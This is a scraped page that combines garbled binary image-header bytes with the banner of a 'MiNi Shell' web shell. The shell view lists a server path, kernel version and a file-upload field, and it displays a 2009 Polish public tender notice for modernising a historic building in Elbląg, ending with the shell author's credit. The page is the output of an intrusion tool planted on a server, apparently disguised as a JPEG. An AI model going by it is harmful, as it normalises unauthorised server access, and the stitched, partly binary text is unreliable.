JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090729/122449-N-2009.html

<p class="kh_header"><b>Olsztyn: Opracowanie dokumentacji projektowej oraz realizację modernizacji zabytkowego budynku przy ul. Zacisze 18 w Elblągu.</b><br>
<b>Numer ogłoszenia: 122449 - 2009; data zamieszczenia: 29.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Warmińsko-Mazurskie reprezentowane przez Zarząd Województwa , ul. Emilii Plater 1, 10-562 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5219100, faks 089 5219109, 5219849.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warmia.mazury.pl/BIP</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej oraz realizację modernizacji zabytkowego budynku przy ul. Zacisze 18 w Elblągu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia:     
1) Przedmiotem zamówienia jest opracowanie dokumentacji projektowej oraz realizację modernizacji zabytkowego budynku przy ul. Zacisze 18 w Elblągu z przeznaczeniem na siedzibę Biura Regionalnego Urzędu Marszałkowskiego Województwa Warmińsko - Mazurskiego, obejmujące: 
a) opracowanie kompletnej dokumentacji projektowej budowlanej, wykonawczej i renowacyjnej, kosztorysowej oraz specyfikacji technicznej wykonania i odbioru robót dla zadania wraz z wszelkimi niezbędnymi do prawidłowego funkcjonowania instalacjami i urządzeniami, w ilości niezbędnej do prawidłowej, zgodnej z przepisami prawa, realizacji przedmiotu umowy - min. w 4 egz. oraz na nośniku CD;
b) uzyskanie uzgodnień, opinii oraz odstępstw od obowiązujących przepisów, niezbędnych do uzyskania przez Zamawiającego pozwolenia na budowę właściwego miejscowo organu administracji architektoniczno-budowlanej i nadzoru budowlanego;
c) wykonanie robót budowlanych, renowacyjnych i instalacyjnych, zgodnie z opracowaną i uzgodnioną z Zamawiającym dokumentacją projektową i kosztorysową;
d) opracowanie dokumentacji budowlanej powykonawczej, dokumentacji geodezyjno - kartograficznej w 3 egz. oraz uzyskanie zgody na użytkowanie budynku.
2) Szczegółowy opis przedmiotu zamówienia znajduje się w Programie Funkcjonalno - Użytkowym, stanowiącym załącznik nr 1 do SIWZ.
2. Wymagania Zamawiającego dotyczące przedmiotu zamówienia:
1) Wykonawca zobowiązuje się realizować zadanie zgodnie ze zleceniem Zamawiającego,  zasadami współczesnej wiedzy  technicznej, Prawem Budowlanym, obowiązującymi w tym zakresie normami i przepisami.
2) Zakres i forma dokumentacji projektowej musi być zgodna z  Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (DZ.U. Nr 202 z 2004r., poz. 2072 z późn. zm.). Przyjęte rozwiązania muszą odpowiadać zasadom wiedzy technicznej, obowiązującym normom przenoszącym europejskie normy zharmonizowane, przepisom techniczno-budowlanym i warunkom technicznym wynikającym z funkcji, jaką będzie pełnić obiekt budowlany.
3) Dokumentacja projektowa budowlana i wykonawcza obiektu budowlanego wraz z instalacjami i urządzeniami technicznymi musi obejmować wszystkie  niezbędne opracowania branżowe wraz ze wszystkimi wymaganymi uzgodnieniami niezbędnymi do uzyskania przez Zamawiającego pozwolenia na budowę, koniecznymi do przyszłej realizacji obiektu i przekazania go do użytkowania.
4) Opracowana dokumentacja projektowa budowlana i wykonawcza musi być spójna i skoordynowana we wszystkich branżach oraz musi zawierać rozwiązania funkcjonalno-użytkowe, konstrukcyjne, materiałowe i kosztowe. Spójność projektu we wszystkich branżach dotyczy również, spójności ze specyfikacją techniczną wykonania i odbioru robót, przedmiarami robót oraz kosztorysami inwestorskimi.
5) Wykonawca zapewnia nadzór autorski w ramach wykonanej dokumentacji projektowej, do czasu zrealizowania inwestycji.
6) Najpóźniej w dniu podpisania umowy Wykonawca dostarczy Zamawiającemu harmonogram rzeczowo - finansowy realizacji zadania, stanowiącego przedmiot niniejszej umowy.
7) Wykonawca zobowiązuje się wykonać przedmiot umowy przy użyciu własnych materiałów.
8) Wykonawca zobowiązuje się stosować do prac budowlanych materiały budowlane posiadające wymagane ustawą Prawo budowlane certyfikaty lub deklaracje zgodności z Polską Normą lub aprobatą techniczną lub inne wyroby budowlane dopuszczone do obrotu, zgodnie z Ustawą z dnia 07 lipca 1994 r. Prawo budowlane (Dz.U. z 2006 r., Nr 156, poz. 1118 z późn. zm.).
9) Wykonawca, najpóźniej w dniu odbioru robót, dostarczy Zamawiającemu  wymagane ustawą Prawo budowlane certyfikaty lub deklaracje zgodności z Polską Normą lub aprobatą techniczną na zastosowane materiały budowlane.
10) Zamawiający w każdym czasie może poddać materiały zastosowane przez Wykonawcę badaniom w określonym przez siebie miejscu.
11) Materiały pochodzące z rozbiórki Wykonawca komisyjnie rozliczy z Zamawiającym i dostarczy do wskazanego miejsca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.22.10.00-3, 45.45.31.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 17.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wysokość wadium:
Zamawiający wymaga wniesienia wadium w wysokości 30.000,00 zł (słownie: trzydzieści tysięcy zł)

2. Forma wniesienia wadium:
1)Wadium może być wniesione w następujących formach:
a)pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze zobowiązaniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).

2)W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)nazwę dającego zlecenie (Wykonawcy), w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - wszystkich współwykonawców lub lidera konsorcjum, jeżeli jest upoważniony do wniesienia wadium w imieniu współwykonawców),beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b)określenie wierzytelności, która ma być zabezpieczona gwarancją,
c)kwotę gwarancji,
d)termin ważności gwarancji, obejmujący co najmniej okres związania ofertą, 
e)bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
-odmówił podpisania umowy na warunkach określonych w ofercie, lub
-nie wniósł zabezpieczenia należytego wykonania umowy, lub
-zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
3)Postanowienia pkt 2) stosuje się również do poręczeń, określonych w pkt 1) b) i 1) e).

3.Miejsce i termin wniesienia wadium:
1)Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego, otwarty  w : Banku MILLENNIUM S.A., nr konta: 37 1160 2202 0000 0000 3099 0280.
2)Do oferty należy dołączyć kopię polecenia przelewu. Na przelewie powinien być umieszczony tytuł: Wadium - postępowanie ZP.333-40/2009 na opracowanie dokumentacji projektowej oraz realizację modernizacji zabytkowego budynku przy ul. Zacisze 18 w Elblągu.
3)Wadium wnoszone w innych dopuszczalnych przez Zamawiającego formach należy złożyć: oryginał wadium w oryginalnym egzemplarzu oferty.
4)Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 
W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.

4.Zwrot wadium:
1)Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 u.p.z.p.  
2)Wadium Wykonawcy, którego oferta zostanie wybrana zostanie zwolnione wówczas, gdy Wykonawca dostarczy wymagane zabezpieczenie należytego wykonania umowy i podpisze umowę.
3)Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału 
w postępowaniu, o których mowa w art. 22 ust. 1 ustawy:
1.1 Wykonawca posiadający uprawnienia do występowania w obrocie prawnym.
1.2 Wykonawca posiadający niezbędną wiedzę i doświadczenie oraz dysponujący  potencjałem  technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
W szczególności Wykonawca musi spełniać następujące warunki: (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie)
1) musi dysponować następującymi osobami zdolnymi do wykonania niniejszego zamówienia:
I. Zespół projektowy:
a) Kierownik Zespołu Projektowego - Projektant branży architektonicznej - posiadający, zgodnie z ustawą Prawo budowlane, uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej oraz zrzeszony we właściwej miejscowo Okręgowej  Izbie Architektów - min. 1 osoba; 
b) Projektant branży konstrukcyjno-budowlanej - posiadający, zgodnie z ustawą Prawo budowlane, uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej oraz zrzeszony we właściwej miejscowo Okręgowej  Izbie Inżynierów Budownictwa - min. 1 osoba; 
c) Projektant branży instalacji elektrycznych - posiadający, zgodnie z ustawą Prawo budowlane, uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz zrzeszony we właściwej miejscowo Okręgowej  Izbie Inżynierów Budownictwa - min. 1 osoba; 
d) Projektant branży instalacji sanitarnych - posiadający, zgodnie z ustawą Prawo budowlane, uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych oraz zrzeszony we właściwej miejscowo Okręgowej  Izbie Inżynierów Budownictwa - min. 1 osoba; 
e) Autor programu prac konserwatorskich- posiadający tytuł magistra uzyskany w wyniku ukończenia studiów wyższych na kierunku - konserwacja zabytków oraz posiadający co najmniej 12 - miesięcy doświadczenia zawodowego w pracach przy konserwacji zabytków nieruchomych - min. 1 osoba; 

II. Zespół wykonawczy:

f) Kierownikiem Budowy  - posiadający, zgodnie z ustawą Prawo budowlane, uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, zrzeszony we właściwej miejscowo Okręgowej  Izbie Inżynierów Budownictwa oraz posiadający co najmniej 2 lata doświadczenia zawodowego w pracach przy budowlanych przy zabytkach nieruchomych - min. 1 osoba;  
g) Kierownikiem Prac Konserwatorskich  - posiadający tytuł magistra uzyskany w wyniku ukończenia studiów wyższych na kierunku - konserwacja zabytków oraz posiadający co najmniej 12 - miesięcy doświadczenia zawodowego w pracach przy konserwacji zabytków nieruchomych - min. 1 osoba; 
h) Kierownikiem branży instalacji elektrycznych  - posiadający, zgodnie z ustawą Prawo budowlane, uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz zrzeszony we właściwej miejscowo Okręgowej  Izbie Inżynierów Budownictwa - min. 1 osoba;  
i) Kierownikiem branży instalacji sanitarnych  - posiadający, zgodnie z ustawą Prawo budowlane, uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych oraz zrzeszony we właściwej miejscowo Okręgowej  Izbie Inżynierów Budownictwa - min. 1 osoba;  

Wszystkie ww. osoby muszą znać język polski w stopniu umożliwiającym swobodne porozumiewanie się w mowie i w piśmie. W zakresie znajomości języka polskiego Zamawiający dopuszcza spełnienie tego warunku poprzez zatrudnienie przez Wykonawcę, na własny koszt, tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach z Zamawiającym.
2) musi wykazać doświadczenie w realizacji, w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1-ej roboty budowlanej, której przedmiotem było wykonanie robót budowlanych o wartości nie mniejszej niż 700.000,00 zł brutto, w budynku wpisanym do rejestru zabytków.

1.3 Wykonawca znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
W szczególności Wykonawca musi spełniać następujący warunek: (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa) 
1) musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 500.000 zł brutto.
1.4 Wykonawca nie podlegający  wykluczeniu z postępowania o udzielenie zamówienia.


2. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia:

1)Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i udzielić zamówienia.
2)W przypadku, o którym mowa w pkt. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnik zwraca się do zamawiającego z wszelkimi sprawami i do niego zamawiający kieruje informacje, korespondencję itp.
3)Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, o których mowa w pkt 1.  
4)Jeżeli oferta wykonawców o których mowa w pkt. 1 została wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, dostarczenia umowy regulującej  współpracę tych wykonawców, która będzie zawierała co najmniej:
a)  zobowiązanie do realizacji  wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia oraz ich solidarną odpowiedzialność za wykonanie zamówienia,
b)   określenie zakresu działania poszczególnych stron umowy,
c)  czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi.
Dokument należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
5)Wykonawcy, o których mowa w pkt. 1 ponoszą solidarną odpowiedzialność za wykonanie umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu określonych w niniejszej  specyfikacji istotnych warunków zamówienia, Wykonawcy złożą następujące dokumenty i oświadczenia:
1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  składania oferty; (w przypadku wykonawców występujących wspólnie w/w dokument  składa każdy z wykonawców);
2)  Oświadczenie Wykonawcy o spełnieniu warunków art. 22 ust. 1 ustawy - Prawo zamówień  publicznych - załącznik nr 4 do SIWZ;
W przypadku Wykonawców ubiegających się wspólnie o zamówienie, każdy z Wykonawców składa  oświadczenie w zakresie spełnienia warunku udziału w postępowaniu, o którym mowa w art. 22 ust. 1 pkt  4 ustawy - załącznik nr 5 do SIWZ.
2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Wykonawcy zobowiązani są przedłożyć następujące dokumenty: 
1) Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć wykonaniu niniejszego zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, w zakresie wskazanym w § 8 pkt 1.2. ppkt 1), a także zakresu wykonywanych przez nich czynności - załącznik nr 6 do SIWZ 

2) W przypadku wykazania przez Wykonawcę osób, którymi będzie dysponował przy realizacji zamówienia Wykonawca musi dostarczyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - załącznik nr 7 do SIWZ.

3) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robocie budowlanej stanowiącej przedmiot zamówienia, w zakresie wskazanym w § 8 pkt 1.2 ppkt 1) IDW, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - załącznik nr 8 do SIWZ.                                    
Wraz z wykazem należy przedłożyć dokumenty potwierdzające, że usługi te zostały wykonane należycie.
3. W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia Wykonawca musi przedłożyć następujące dokumenty : 
1) Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w zakresie wskazanym w § 8 pkt 1.3 ppkt 3). (W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, ww. polisę lub inny dokument ubezpieczenia może złożyć jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, na całą wymaganą kwotę ubezpieczenia lub kilku na łączną wymaganą kwotę.) 
4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej   Polskiej zamiast dokumentu, o którym mowa w § 9 ust. 1 pkt 1 SIWZ, składa dokument wystawiony w terminie  i  formie określonej w  § 2 ust. 1, 2, 3  Rozporządzenia  Prezesa   Rady Ministrów z dnia 19 maja 2006 r., w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane.
5. Dokumenty składane w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. Kopia tłumaczenia musi być poświadczona wg poniższych zasad.
6. Dopuszcza się przedstawienie kopii dokumentów uwierzytelnionych osobiście przez Wykonawcę lub notariusza oraz przez umocowanego przedstawiciela Wykonawcy.
Pełnomocnicy działający w imieniu Wykonawcy muszą wykazać swoje umocowanie do działania. Pełnomocnictwo legitymuje pełnomocnika do wykonywania czynności prawnych w imieniu mocodawcy zatem jego zakres i okres obowiązywania powinien być wyraźnie i precyzyjnie określony.
Pełnomocnictwo winno być dołączone do oferty w oryginale lub kopii uwierzytelnionej przez mocodawcę lub notariusza. Przyjmuje się, że udzielone pełnomocnictwo upoważnia do poświadczenia kopii innych dokumentów składanych wraz ofertą, z wyłączeniem pełnomocnictwa..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Termin wykonania zamówienia - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.warmia.mazury.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Marszałkowski  Województwa  Warmińsko-Mazurskiego
Departament Zamówień Publicznych i Udzielenia Zezwoleń
ul. Emilii Plater 1  pok. 126,   10-562 Olsztyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2009 godzina 10:00, miejsce: Urząd  Marszałkowski  Województwa  Warmińsko-Mazurskiego
Departament Zamówień Publicznych i Udzielenia Zezwoleń
ul. Emilii Plater 1  pok. 126,   10-562 Olsztyn.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com